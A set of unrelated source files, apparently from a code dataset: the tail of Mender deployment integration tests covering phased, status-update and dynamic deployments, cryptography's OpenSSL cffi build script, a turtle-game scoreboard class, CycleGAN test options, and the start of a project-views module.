while now <= (
start_ts - timedelta(milliseconds=500 * WAITING_MULTIPLIER)
):
# NOTE: ^ add a half a second buffer time to
# account for the delay in sending and
# processing the request.
# Give the devices array a stirr
random.shuffle(devices)
# Concurrently process a batch of requests
device_batch = devices[: max(4, mp.cpu_count())]
status_codes = pool.map(try_update, device_batch)
# Create status code map for usefull debug
# message if we receive a non-empty response
status_code_map = {}
for s in [200, 204, 400, 404, 429, 500]:
status_code_map[s] = sum(
(map(lambda sc: sc == s, status_codes))
)
# Check that all requests received an empty response
assert (status_code_map[204] + status_code_map[429]) == len(
status_codes
), (
"Expected empty response (204) during inactive "
+ "phase, but received the following status "
+ "code frequencies: %s" % status_code_map
)
now = datetime.utcnow()
# Sleep the last 500ms to let the next phase start
time.sleep(0.5 * WAITING_MULTIPLIER)
else:
raise ValueError(
"Invalid phased deployment request, "
"missing `start_ts` for phase %d" % i
)
# Make all devices attempt to update (in a concurrent manner)
# and check that the number of successful responses equals
# the number of devices in the batch.
with mp.Pool(processes=max(4, mp.cpu_count())) as pool:
status_codes = pool.map(try_update, devices)
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS_ID.format(id=deployment_id)
)
assert resp.status_code == 200
phases = resp.json()["phases"]
assert sum(map(lambda s: s == 200, status_codes)) == batch_sizes[i]
for j in range(len(devices)):
if status_codes[j] == 200:
devices[j].artifact_name = "deployments-phase-testing"
# Check phase count equals batch size
resp = api_mgmt_deploy.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS_ID.format(id=deployment_id)
)
assert resp.status_code == 200
phases = resp.json()["phases"]
for p in range(i + 1):
assert phases[p]["device_count"] == batch_sizes[p]
for p in range(i + 1, len(phases)):
assert phases[p]["device_count"] == 0
# Finally confirm that deployment is finished
assert resp.json()["status"] == "finished"
def test_two_phases_concurrent_devices(self, clean_mongo):
"""
Two phases where devices perform requests in parallel to stress
the backends capability of handling parallel requests.
"""
user, tenant, utoken, devs = setup_devices_and_management_mt()
deployment_req = {
"name": "two-fully-spec-deployments",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs],
"phases": [
{"batch_size": 10},
{
"start_ts": (
datetime.utcnow() + timedelta(seconds=15 * WAITING_MULTIPLIER)
).strftime("%Y-%m-%dT%H:%M:%SZ"),
"batch_size": 90,
},
],
}
self.try_concurrent_phased_updates(deployment_req, devs, utoken)
# test status update
class StatusVerifier:
def __init__(self, deploymentsm, deploymentsd):
self.deploymentsm = deploymentsm
self.deploymentsd = deploymentsd
def status_update_and_verify(
self,
device_id,
device_token,
deployment_id,
user_token,
status_update,
device_deployment_status,
deployment_status,
status_update_error_code=204,
substate_update="",
substate="",
):
body = {"status": status_update}
if substate_update != "":
body = {"status": status_update, "substate": substate_update}
# Update device status upon successful request
resp = self.deploymentsd.with_auth(device_token).call(
"PUT", deployments.URL_STATUS.format(id=deployment_id), body=body,
)
assert resp.status_code == status_update_error_code
self.status_verify(
deployment_id=deployment_id,
user_token=user_token,
device_id=device_id,
device_deployment_status=device_deployment_status,
deployment_status=deployment_status,
substate=substate,
)
def status_verify(
self,
deployment_id,
user_token,
device_id="",
device_deployment_status="",
deployment_status="",
substate="",
):
if device_deployment_status != "":
resp = self.deploymentsm.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS_DEVICES.format(id=deployment_id)
)
resp.status_code == 200
devices = resp.json()
for device in devices:
if device["id"] == device_id:
assert device["status"] == device_deployment_status
if substate != "":
assert device["substate"] == substate
if deployment_status != "":
resp = self.deploymentsm.with_auth(user_token).call(
"GET", deployments.URL_DEPLOYMENTS.format(id=deployment_id)
)
resp.status_code == 200
assert resp.json()[0]["status"] == deployment_status
class TestDeploymentsStatusUpdateBase:
def do_test_deployment_status_update(
self, clean_mongo, user_token, devs, deploy_to_group=None
):
"""
deployment with four devices
requires five devices (last one won't be part of the deployment
"""
deploymentsm = ApiClient(deployments.URL_MGMT)
deploymentsd = ApiClient(deployments.URL_DEVICES)
status_verifier = StatusVerifier(deploymentsm, deploymentsd)
# Make deployment request
deployment_req = {
"name": "phased-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [dev.id for dev in devs[:-1]],
}
if deploy_to_group:
deployment_req = {
"name": "phased-deployment",
"artifact_name": "deployments-phase-testing",
"devices": [],
"group": deploy_to_group,
"retries": 0,
}
resp = deploymentsm.with_auth(user_token).call(
"POST", deployments.URL_DEPLOYMENTS, deployment_req
)
if deploy_to_group:
resp = deploymentsm.with_auth(user_token).call(
"POST",
deployments.URL_DEPLOYMENTS + "/group/" + deploy_to_group,
deployment_req,
)
assert resp.status_code == 201
# Store the location from the GET /deployments/{id} request
deployment_id = os.path.basename(resp.headers["Location"])
# Verify that the deployment is in "pending" state
status_verifier.status_verify(
deployment_id=deployment_id,
user_token=user_token,
deployment_status="pending",
)
default_artifact_name = "bugs-bunny"
default_device_type = "qemux86-64"
# Try to retrieve next update and assert expected status code
resp = deploymentsd.with_auth(devs[0].token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": getattr(
devs[0], "artifact_name", default_artifact_name
),
"device_type": getattr(devs[0], "device_type", default_device_type),
},
)
assert resp.status_code == 200
# Try to retrieve next update for the device that already has the artifact
resp = deploymentsd.with_auth(devs[1].token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": "deployments-phase-testing",
"device_type": getattr(devs[1], "device_type", default_device_type),
},
)
assert resp.status_code == 204
status_verifier.status_verify(
deployment_id=deployment_id,
user_token=user_token,
device_id=devs[1].id,
device_deployment_status="already-installed",
deployment_status="inprogress",
)
# Try to retrieve next update for the device with incompatible device type
resp = deploymentsd.with_auth(devs[2].token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": getattr(
devs[2], "artifact_name", default_artifact_name
),
"device_type": "foo",
},
)
assert resp.status_code == 204
status_verifier.status_verify(
deployment_id=deployment_id,
user_token=user_token,
device_id=devs[2].id,
device_deployment_status="noartifact",
deployment_status="inprogress",
)
# device not part of the deployment
status_verifier.status_update_and_verify(
device_id=devs[4].id,
device_token=devs[4].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="installing",
device_deployment_status="does-not-matter",
deployment_status="inprogress",
status_update_error_code=500,
)
# wrong status
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="foo",
device_deployment_status="pending",
deployment_status="inprogress",
status_update_error_code=400,
)
# device deployment: pending -> downloading
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="downloading",
device_deployment_status="downloading",
deployment_status="inprogress",
)
# devs[0] deployment: downloading -> installing
# substate: "" -> "foo"
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="installing",
device_deployment_status="installing",
deployment_status="inprogress",
substate_update="foo",
substate="foo",
)
# devs[0] deployment: installing -> downloading
"""
note that until the device deployment is finished
transition to any of valid statuses is correct
"""
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="downloading",
device_deployment_status="downloading",
deployment_status="inprogress",
substate="foo",
)
# devs[0] deployment: downloading -> rebooting
# substate: "foo" -> "bar"
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="rebooting",
device_deployment_status="rebooting",
deployment_status="inprogress",
substate_update="bar",
substate="bar",
)
# devs[0] deployment: rebooting -> success
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="success",
device_deployment_status="success",
deployment_status="inprogress",
substate="bar",
)
# devs[0] deployment already finished
status_verifier.status_update_and_verify(
device_id=devs[0].id,
device_token=devs[0].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="pending",
device_deployment_status="success",
deployment_status="inprogress",
status_update_error_code=400,
substate="bar",
)
# Try to retrieve next update and assert expected status code
resp = deploymentsd.with_auth(devs[3].token).call(
"GET",
deployments.URL_NEXT,
qs_params={
"artifact_name": getattr(
devs[3], "artifact_name", default_artifact_name
),
"device_type": getattr(devs[3], "device_type", default_device_type),
},
)
assert resp.status_code == 200
# device deployment: pending -> failure
# deployment: inprogress -> finished
status_verifier.status_update_and_verify(
device_id=devs[3].id,
device_token=devs[3].token,
deployment_id=deployment_id,
user_token=user_token,
status_update="failure",
device_deployment_status="failure",
deployment_status="finished",
)
class TestDeploymentsStatusUpdate(TestDeploymentsStatusUpdateBase):
def test_deployment_status_update(self, clean_mongo):
_user, user_token, devs = setup_devices_and_management_st(5)
self.do_test_deployment_status_update(clean_mongo, user_token, devs)
class TestDeploymentsStatusUpdateEnterprise(TestDeploymentsStatusUpdateBase):
def test_deployment_status_update(self, clean_mongo):
_user, _tenant, user_token, devs = setup_devices_and_management_mt(5)
self.do_test_deployment_status_update(clean_mongo, user_token, devs)
class TestDeploymentsToGroupStatusUpdate(TestDeploymentsStatusUpdateBase):
def test_deployment_status_update(self, clean_mongo):
_user, user_token, devs = setup_devices_and_management_st(
5, deploy_to_group="g0"
)
self.do_test_deployment_status_update(
clean_mongo, user_token, devs, deploy_to_group="g0"
)
class TestDeploymentsToGroupStatusUpdateEnterprise(TestDeploymentsStatusUpdateBase):
def test_deployment_status_update(self, clean_mongo):
_user, _tenant, user_token, devs = setup_devices_and_management_mt(
5, deploy_to_group="g0"
)
self.do_test_deployment_status_update(
clean_mongo, user_token, devs, deploy_to_group="g0"
)
def create_tenant(name, username, plan):
tenant = create_org(name, username, "correcthorse", plan=plan)
user = tenant.users[0]
r = ApiClient(useradm.URL_MGMT).call(
"POST", useradm.URL_LOGIN, auth=(user.name, user.pwd)
)
assert r.status_code == 200
user.utoken = r.text
return tenant
@pytest.fixture(scope="function")
def setup_tenant(clean_mongo):
uuidv4 = str(uuid.uuid4())
tenant = create_tenant(
"test.mender.io-" + uuidv4, "some.user+" + uuidv4 + "@example.com", "enterprise"
)
# give workflows time to finish provisioning
time.sleep(10)
return tenant
@pytest.fixture(scope="function")
def clean_mongo_client(mongo):
"""Fixture setting up a clean (i.e. empty database). Yields
common.MongoClient connected to the DB.
Useful for tests with multiple testcases:
- protects the whole test func as usual
- but also allows calling MongoClient.cleanup() between cases
"""
mongo_cleanup(mongo)
yield mongo
mongo_cleanup(mongo)
def predicate(attr, scope, t, val):
return {"attribute": attr, "scope": scope, "type": t, "value": val}
def create_filter(name, predicates, utoken):
f = {"name": name, "terms": predicates}
r = (
ApiClient(inventory_v2.URL_MGMT)
.with_auth(utoken)
.call("POST", inventory_v2.URL_FILTERS, f)
)
assert r.status_code == 201
f["id"] = r.headers["Location"].split("/")[1]
return f
def create_dynamic_deployment(
name, predicates, utoken, max_devices=None, phases=None, status_code=201
):
f = create_filter(name, predicates, utoken)
api_dep_v2 = ApiClient(deployments_v2.URL_MGMT)
depid = None
with get_mender_artifact(name) as filename:
upload_image(filename, utoken)
deployment_req = {
"name": name,
"artifact_name": name,
"filter_id": f["id"],
}
if max_devices is not None:
deployment_req["max_devices"] = max_devices
if phases is not None:
deployment_req["phases"] = phases
res = api_dep_v2.with_auth(utoken).call(
"POST", deployments_v2.URL_DEPLOYMENTS, deployment_req
)
assert res.status_code == status_code
if status_code != 201:
return None
depid = res.headers["Location"].split("/")[5]
newdep = get_deployment(depid, utoken)
assert newdep["name"] == name
assert newdep["filter"]["id"] == f["id"]
assert newdep["filter"]["terms"] == predicates
assert newdep["status"] == "pending"
assert newdep["dynamic"]
return newdep
def get_deployment(depid, utoken):
api_dep_v1 = ApiClient(deployments.URL_MGMT)
res = api_dep_v1.with_auth(utoken).call(
"GET", deployments.URL_DEPLOYMENTS_ID, path_params={"id": depid}
)
assert res.status_code == 200
return res.json()
def make_device_with_inventory(attributes, utoken, tenant_token):
devauthm = ApiClient(deviceauth.URL_MGMT)
devauthd = ApiClient(deviceauth.URL_DEVICES)
invm = ApiClient(inventory.URL_MGMT)
d = make_accepted_device(devauthd, devauthm, utoken, tenant_token)
"""
verify that the status of the device in inventory is "accepted"
"""
accepted = False
timeout = 10
for i in range(timeout):
r = invm.with_auth(utoken).call("GET", inventory.URL_DEVICE.format(id=d.id))
if r.status_code == 200:
dj = r.json()
for attr in dj["attributes"]:
if attr["name"] == "status" and attr["value"] == "accepted":
accepted = True
break
if accepted:
break
time.sleep(1)
if not accepted:
raise ValueError(
"status for device %s has not been propagated within %d seconds"
% (d.id, timeout)
)
submit_inventory(attributes, d.token)
d.attributes = attributes
return d
def submit_inventory(attrs, token):
invd = ApiClient(inventory.URL_DEV)
r = invd.with_auth(token).call("PATCH", inventory.URL_DEVICE_ATTRIBUTES, attrs)
assert r.status_code == 200
def update_deployment_status(deployment_id, status, token):
api_dev_deploy = ApiClient(deployments.URL_DEVICES)
body = {"status": status}
resp = api_dev_deploy.with_auth(token).call(
"PUT", deployments.URL_STATUS.format(id=deployment_id), body=body,
)
assert resp.status_code == 204
def assert_get_next(code, dtoken, artifact_name=None):
api_dev_deploy = ApiClient(deployments.URL_DEVICES)
resp = api_dev_deploy.with_auth(dtoken).call(
"GET",
deployments.URL_NEXT,
qs_params={"artifact_name": "dontcare", "device_type": "arm1"},
)
assert resp.status_code == code
if code == 200:
assert resp.json()["artifact"]["artifact_name"] == artifact_name
def set_status(depid, status, dtoken):
api_dev_deploy = ApiClient(deployments.URL_DEVICES)
res = api_dev_deploy.with_auth(dtoken).call(
"PUT", deployments.URL_STATUS.format(id=depid), body={"status": status},
)
assert res.status_code == 204
def get_stats(depid, token):
api_dev_deploy = ApiClient(deployments.URL_MGMT)
res = api_dev_deploy.with_auth(token).call(
"GET", deployments.URL_DEPLOYMENTS_STATISTICS.format(id=depid),
)
assert res.status_code == 200
return res.json()
def verify_stats(stats, expected):
for k, v in stats.items():
if k in expected:
assert stats[k] == expected[k]
else:
assert stats[k] == 0
class TestDynamicDeploymentsEnterprise:
@pytest.mark.parametrize(
"tc",
[
# single predicate, $eq
{
"name": "single predicate, $eq",
"predicates": [predicate("foo", "inventory", "$eq", "123")],
"matches": [
[{"name": "foo", "value": "123"}],
[{"name": "foo", "value": "123"}, {"name": "bar", "value": "1"}],
[
{"name": "foo", "value": ["123", "qwerty"]},
{"name": "bar", "value": "1"},
],
],
"nonmatches": [
[{"name": "foo", "value": "1"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": 1}, {"name": "bar", "value": 123}],
[{"name": "baz", "value": "baz"}],
],
},
# single predicate, $ne
{
"name": "single predicate, $ne",
"predicates": [predicate("foo", "inventory", "$ne", "123")],
"matches": [
[{"name": "foo", "value": "1"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": 1}, {"name": "bar", "value": 123}],
[{"name": "baz", "value": "baz"}],
],
"nonmatches": [
[{"name": "foo", "value": "123"}],
[{"name": "foo", "value": "123"}, {"name": "bar", "value": "1"}],
[
{"name": "foo", "value": ["123", "qwerty"]},
{"name": "bar", "value": "1"},
],
],
},
# single predicate, $in
{
"name": "single predicate, $in",
"predicates": [predicate("foo", "inventory", "$in", ["1", "2", "3"])],
"matches": [
[{"name": "foo", "value": "1"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "2"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "3"}, {"name": "bar", "value": "123"}],
],
"nonmatches": [
[{"name": "foo", "value": "4"}, {"name": "bar", "value": 123}],
[{"name": "foo", "value": 1}, {"name": "bar", "value": 123}],
[{"name": "bar", "value": "1"}],
],
},
# single predicate, $gt
{
"name": "single predicate, $gt",
"predicates": [predicate("foo", "inventory", "$gt", "abc")],
"matches": [
[{"name": "foo", "value": "cde"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "def"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "fgh"}, {"name": "bar", "value": "123"}],
],
"nonmatches": [
[{"name": "foo", "value": "aaa"}, {"name": "bar", "value": 123}],
[{"name": "foo", "value": "aab"}, {"name": "bar", "value": 123}],
[{"name": "bar", "value": "abb"}],
],
},
# single predicate, $exists
{
"name": "single predicate, $exists",
"predicates": [predicate("foo", "inventory", "$exists", True)],
"matches": [
[{"name": "foo", "value": "cde"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "def"}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": "fgh"}, {"name": "bar", "value": "123"}],
],
"nonmatches": [
[{"name": "bar", "value": 123}],
[{"name": "bar", "value": 456}],
],
},
# combined predicates on single attr
{
"name": "combined predicates on single attr",
"predicates": [
predicate("foo", "inventory", "$gte", 100),
predicate("foo", "inventory", "$lte", 200),
],
"matches": [
[{"name": "foo", "value": 100}],
[{"name": "foo", "value": 200}, {"name": "bar", "value": "1"}],
[{"name": "foo", "value": 150}, {"name": "bar", "value": "1"}],
],
"nonmatches": [
[{"name": "foo", "value": 99}, {"name": "bar", "value": "123"}],
[{"name": "foo", "value": 201}, {"name": "bar", "value": 123}],
],
},
# combined predicates on many attrs
{
"name": "combined predicates on many attrs",
"predicates": [
predicate("foo", "inventory", "$eq", "foo"),
predicate("bar", "inventory", "$in", ["bar1", "bar2", "bar3"]),
],
"matches": [
[{"name": "foo", "value": "foo"}, {"name": "bar", "value": "bar1"}],
[{"name": "foo", "value": "foo"}, {"name": "bar", "value": "bar2"}],
[
{"name": "foo", "value": ["foo"]},
{"name": "bar", "value": "bar3"},
],
],
"nonmatches": [
[{"name": "foo", "value": "foo"}],
[{"name": "foo", "value": "foo"}],
[{"name": "foo", "value": "bar1"}],
],
},
],
)
def test_assignment_based_on_filters(self, clean_mongo_client, tc):
""" Test basic dynamic deployments characteristic:
- deployments match on inventory attributes via various filter predicates
"""
uuidv4 = str(uuid.uuid4())
tenant = create_tenant(
"test.mender.io-" + uuidv4,
"some.user+" + uuidv4 + "@example.com",
"enterprise",
)
user = tenant.users[0]
matching_devs = [
make_device_with_inventory(attrs, user.utoken, tenant.tenant_token)
for attrs in tc["matches"]
]
nonmatching_devs = [
make_device_with_inventory(attrs, user.utoken, tenant.tenant_token)
for attrs in tc["nonmatches"]
]
dep = create_dynamic_deployment("foo", tc["predicates"], user.utoken)
assert dep["initial_device_count"] == len(matching_devs)
for d in matching_devs:
assert_get_next(200, d.token, "foo")
for d in nonmatching_devs:
assert_get_next(204, d.token)
def test_unbounded_deployment_lifecycle(self, setup_tenant):
""" Check how a dynamic deployment (no bounds) progresses through states
based on device activity (status, statistics).
"""
user = setup_tenant.users[0]
dep = create_dynamic_deployment(
"foo", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
devs = [
make_device_with_inventory(
[{"name": "foo", "value": "foo"}],
user.utoken,
setup_tenant.tenant_token,
)
for i in range(10)
]
for d in devs:
assert_get_next(200, d.token, "foo")
# just getting a 'next' deployment has no effect on overall status
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "pending"
# when some devices start activity ('downloading', 'installing', 'rebooting'),
# the deployment becomes 'inprogress'
for d in devs:
if devs.index(d) < 3:
set_status(dep["id"], "downloading", d.token)
elif devs.index(d) < 6:
set_status(dep["id"], "installing", d.token)
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "inprogress"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"downloading": 3, "installing": 3, "pending": 4})
# when all devices finish, the deployment goes back to 'pending'
for d in devs:
if devs.index(d) < 5:
set_status(dep["id"], "success", d.token)
else:
set_status(dep["id"], "failure", d.token)
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "inprogress"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"success": 5, "failure": 5})
def test_bounded_deployment_lifecycle(self, setup_tenant):
""" Check how a dynamic deployment with max_devices progresses through states
based on device activity (status, statistics).
"""
user = setup_tenant.users[0]
dep = create_dynamic_deployment(
"foo",
[predicate("foo", "inventory", "$eq", "foo")],
user.utoken,
max_devices=10,
)
devs = [
make_device_with_inventory(
[{"name": "foo", "value": "foo"}],
user.utoken,
setup_tenant.tenant_token,
)
for i in range(10)
]
for d in devs:
assert_get_next(200, d.token, "foo")
# just getting a 'next' deployment has no effect on overall status
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "pending"
# when devices start activity ('downloading', 'installing', 'rebooting'),
# the deployment becomes 'inprogress'
for d in devs:
if devs.index(d) < 5:
set_status(dep["id"], "downloading", d.token)
else:
set_status(dep["id"], "installing", d.token)
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "inprogress"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"downloading": 5, "installing": 5})
# all devices finish - and the deployment actually becomes 'finished'
for d in devs:
set_status(dep["id"], "success", d.token)
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "finished"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"success": 10})
# an extra dev won't get this deployment
extra_dev = make_device_with_inventory(
[{"name": "foo", "value": "foo"}], user.utoken, setup_tenant.tenant_token
)
assert_get_next(204, extra_dev.token, "foo")
dep = get_deployment(dep["id"], user.utoken)
assert dep["status"] == "finished"
stats = get_stats(dep["id"], user.utoken)
verify_stats(stats, {"success": 10})
def test_deployment_ordering(self, setup_tenant):
""" Check that devices only get dynamic deployments fresher than the
latest one it finished.
In other words, after updating its attributes the device won't accidentally
fall into a deployment previous to what it tried already.
"""
user = setup_tenant.users[0]
create_dynamic_deployment(
"foo1", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
create_dynamic_deployment(
"foo2", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
depbar = create_dynamic_deployment(
"bar", [predicate("foo", "inventory", "$eq", "bar")], user.utoken
)
# the device will ignore the 'foo' deployments, because of its inventory
dev = make_device_with_inventory(
[{"name": "foo", "value": "bar"}], user.utoken, setup_tenant.tenant_token
)
assert_get_next(200, dev.token, "bar")
# when running against staging, wait 5 seconds to avoid hitting
# the rate limits for the devices (one inventory update / 5 seconds)
isK8S() and time.sleep(5.0)
# after finishing 'bar' - no other deployments qualify
set_status(depbar["id"], "success", dev.token)
assert_get_next(204, dev.token)
# when running against staging, wait 5 seconds to avoid hitting
# the rate limits for the devices (one inventory update / 5 seconds)
isK8S() and time.sleep(5.0)
# after updating inventory, the device would qualify for both 'foo' deployments, but
# the ordering mechanism will prevent it
submit_inventory([{"name": "foo", "value": "foo"}], dev.token)
assert_get_next(204, dev.token)
# when running against staging, wait 5 seconds to avoid hitting
# the rate limits for the devices (one inventory update / 5 seconds)
isK8S() and time.sleep(5.0)
# it will however get a brand new 'foo3' deployment, because it's fresher than the finished 'bar'
create_dynamic_deployment(
"foo3", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
create_dynamic_deployment(
"foo4", [predicate("foo", "inventory", "$eq", "foo")], user.utoken
)
assert_get_next(200, dev.token, "foo3")
@pytest.mark.parametrize(
"tc",
[
# without max_devices
{
"name": "without max_devices",
"phases": [{"batch_size": 20}, {"start_ts": None}],
"max_devices": None,
},
# with max_devices
{
"name": "with max_devices",
"phases": [{"batch_size": 20}, {"start_ts": None}],
"max_devices": 10,
},
],
)
def test_phased_rollout(self, clean_mongo_client, tc):
""" Check phased rollouts with and without max_devices.
"""
uuidv4 = str(uuid.uuid4())
tenant = create_tenant(
"test.mender.io-" + uuidv4,
"some.user+" + uuidv4 + "@example.com",
"enterprise",
)
user = tenant.users[0]
# adjust phase start ts for previous test case duration
# format for api consumption
for phase in tc["phases"]:
if "start_ts" in phase:
phase["start_ts"] = datetime.utcnow() + timedelta(
seconds=15 * WAITING_MULTIPLIER
)
phase["start_ts"] = phase["start_ts"].strftime("%Y-%m-%dT%H:%M:%SZ")
# a phased dynamic deployment must have an initial matching devices count
# fails without devices
create_dynamic_deployment(
"foo",
[predicate("foo", "inventory", "$eq", "foo")],
user.utoken,
phases=tc["phases"],
max_devices=tc["max_devices"],
status_code=400,
)
# a deployment with initial devs succeeds
devs = [
make_device_with_inventory(
[{"name": "bar", "value": "bar"}], user.utoken, tenant.tenant_token,
)
for i in range(10)
]
# adjust phase start ts for previous test case duration
# format for api consumption
for phase in tc["phases"]:
if "start_ts" in phase:
phase["start_ts"] = datetime.utcnow() + timedelta(
seconds=15 * WAITING_MULTIPLIER
)
phase["start_ts"] = phase["start_ts"].strftime("%Y-%m-%dT%H:%M:%SZ")
dep = create_dynamic_deployment(
"bar",
[predicate("bar", "inventory", "$eq", "bar")],
user.utoken,
phases=tc["phases"],
max_devices=tc["max_devices"],
)
assert dep["initial_device_count"] == 10
assert len(dep["phases"]) == len(tc["phases"])
# first phase is immediately on
for d in devs[:2]:
assert_get_next(200, d.token, "bar")
set_status(dep["id"], "success", d.token)
for d in devs[2:]:
assert_get_next(204, d.token)
# rough wait for phase 2
time.sleep(15 * WAITING_MULTIPLIER + 1)
for d in devs[2:]:
assert_get_next(200, d.token, "bar")
set_status(dep["id"], "success", d.token)
dep = get_deployment(dep["id"], user.utoken)
if tc["max_devices"] is None:
# no max_devices = deployment remains in progress
assert dep["status"] == "inprogress"
extra_devs = [
make_device_with_inventory(
[{"name": "bar", "value": "bar"}], user.utoken, tenant.tenant_token,
)
for i in range(10)
]
for extra in extra_devs:
assert_get_next(200, extra.token, "bar")
else:
# max_devices reached, so deployment is finished
assert dep["status"] == "finished"
|
the-stack_106_23277 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
import os
import sys
from distutils import dist
from distutils.ccompiler import get_default_compiler
from distutils.command.config import config
from _cffi_src.utils import (
build_ffi_for_binding,
compiler_type,
extra_link_args,
)
def _get_openssl_libraries(platform):
if os.environ.get("CRYPTOGRAPHY_SUPPRESS_LINK_FLAGS", None):
return []
# OpenSSL goes by a different library name on different operating systems.
if platform == "win32" and compiler_type() == "msvc":
return [
"libssl",
"libcrypto",
"advapi32",
"crypt32",
"gdi32",
"user32",
"ws2_32",
]
else:
# darwin, linux, mingw all use this path
# In some circumstances, the order in which these libs are
# specified on the linker command-line is significant;
# libssl must come before libcrypto
# (https://marc.info/?l=openssl-users&m=135361825921871)
# -lpthread required due to usage of pthread an potential
# existance of a static part containing e.g. pthread_atfork
# (https://github.com/pyca/cryptography/issues/5084)
if sys.platform == "zos":
return ["ssl", "crypto"]
else:
return ["ssl", "crypto", "pthread"]
def _extra_compile_args(platform):
"""
We set -Wconversion args here so that we only do Wconversion checks on the
code we're compiling and not on cffi itself (as passing -Wconversion in
CFLAGS would do). We set no error on sign conversion because some
function signatures in LibreSSL differ from OpenSSL have changed on long
vs. unsigned long in the past. Since that isn't a precision issue we don't
care.
"""
# make sure the compiler used supports the flags to be added
is_gcc = False
if get_default_compiler() == "unix":
d = dist.Distribution()
cmd = config(d)
cmd._check_compiler()
is_gcc = (
"gcc" in cmd.compiler.compiler[0]
or "clang" in cmd.compiler.compiler[0]
)
if is_gcc or not (
platform in ["win32", "hp-ux11", "sunos5"]
or platform.startswith("aix")
):
return ["-Wconversion", "-Wno-error=sign-conversion"]
else:
return []
ffi = build_ffi_for_binding(
module_name="_openssl",
module_prefix="_cffi_src.openssl.",
modules=[
# This goes first so we can define some cryptography-wide symbols.
"cryptography",
# Provider comes early as well so we define OSSL_LIB_CTX
"provider",
"aes",
"asn1",
"bignum",
"bio",
"cmac",
"conf",
"crypto",
"dh",
"dsa",
"ec",
"ecdh",
"ecdsa",
"engine",
"err",
"evp",
"fips",
"hmac",
"nid",
"objects",
"ocsp",
"opensslv",
"osrandom_engine",
"pem",
"pkcs12",
"rand",
"rsa",
"ssl",
"x509",
"x509name",
"x509v3",
"x509_vfy",
"pkcs7",
"callbacks",
],
libraries=_get_openssl_libraries(sys.platform),
extra_compile_args=_extra_compile_args(sys.platform),
extra_link_args=extra_link_args(compiler_type()),
)
|
the-stack_106_23278 | # class to handle scorecard
from turtle import Turtle
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.score = 0
self.high_score = 0
self.get_high_score()
self.color("white")
self.penup()
self.update_score()
self.hideturtle()
# get and store highest score
def get_high_score(self):
with open("high_score.txt", mode="r") as file_score:
self.high_score = int(file_score.read())
def set_high_score(self):
with open("high_score.txt", mode="w") as file_score:
file_score.write(f"{self.score}")
# increment score
def incr_score(self):
self.score += 1
self.update_score()
def update_score(self):
self.clear()
self.goto(0, 270)
self.write(f"Score: {self.score} High Score: {self.high_score}", align="center", font=("Arial", 18, "normal"))
# reset score when game over
def reset(self):
if self.score > self.high_score:
self.set_high_score()
self.high_score = self.score
self.score = 0
self.update_score()
|
the-stack_106_23279 | from .base_options import BaseOptionsTest
class TestOptions(BaseOptionsTest):
def initialize(self, parser):
parser = BaseOptionsTest.initialize(self, parser)
parser.add_argument('--ntest', type=int, default=float("inf"), help='# of test examples.')
parser.add_argument('--results_dir', type=str, default='./results/', help='saves results here.')
parser.add_argument('--aspect_ratio', type=float, default=1.0, help='aspect ratio of result images')
parser.add_argument('--phase', type=str, default='test', help='train, val, test, etc')
# Dropout and Batchnorm has different behavioir during training and test.
parser.add_argument('--eval', action='store_true', help='use eval mode during test time.')
parser.add_argument('--num_test', type=int, default=1, help='how many test images to run')
parser.add_argument('--vis', dest='vis',
help='visualization mode',
action='store_true')
parser.set_defaults(model='cycle_gan')
# To avoid cropping, the loadSize should be the same as fineSize
parser.set_defaults(loadSize=parser.get_default('fineSize'))
self.isTrain = False
return parser
|
the-stack_106_23280 | """Project views for authenticated users."""
import logging
from allauth.socialaccount.models import SocialAccount
from celery import chain
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.http import (
Http404,
HttpResponseBadRequest,
HttpResponseNotAllowed,
